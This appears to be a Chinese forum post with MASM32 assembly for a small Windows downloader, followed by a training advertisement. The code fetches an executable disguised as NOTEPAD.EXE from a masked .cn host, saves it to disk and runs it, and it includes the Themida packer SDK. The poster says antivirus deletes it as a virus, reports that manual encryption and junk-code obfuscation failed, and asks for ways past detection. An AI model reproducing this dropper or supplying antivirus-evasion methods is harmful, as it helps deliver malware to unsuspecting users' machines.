.386p
.model flat,stdcall
option casemap:none
include ThemidaSDK.inc
include d:\masm32\include\windows.inc
include d:\masm32\include\user32.inc
include d:\masm32\include\kernel32.inc
include d:\masm32\include\shell32.inc
include d:\masm32\include\urlmon.inc
includelib d:\masm32\lib\user32.lib
includelib d:\masm32\lib\urlmon.lib
includelib d:\masm32\lib\shell32.lib
includelib d:\masm32\lib\kernel32.lib
.data
UrlAddr db 'http://www.*****.cn/NOTEPAD.EXE',0
SaveFileAddr db 'C:\*****\NOTEPAD.EXE',0
.code
main:
invoke URLDownloadToFile,NULL,addr UrlAddr,addr SaveFileAddr,NULL,NULL
invoke ShellExecute,0,0,addr SaveFileAddr,0,0,SW_SHOW
invoke ExitThread,0
end main
这样会被认为病毒文件被宰掉.
我用OD手工加密+花都不行,还是被宰.不知谁有高招.请指点.
[培训]二进制漏洞攻防(第3期);满10人开班;模糊测试与工具使用二次开发;网络协议漏洞挖掘;Linux内核漏洞挖掘与利用;AOSP漏洞挖掘与利用;代码审计。
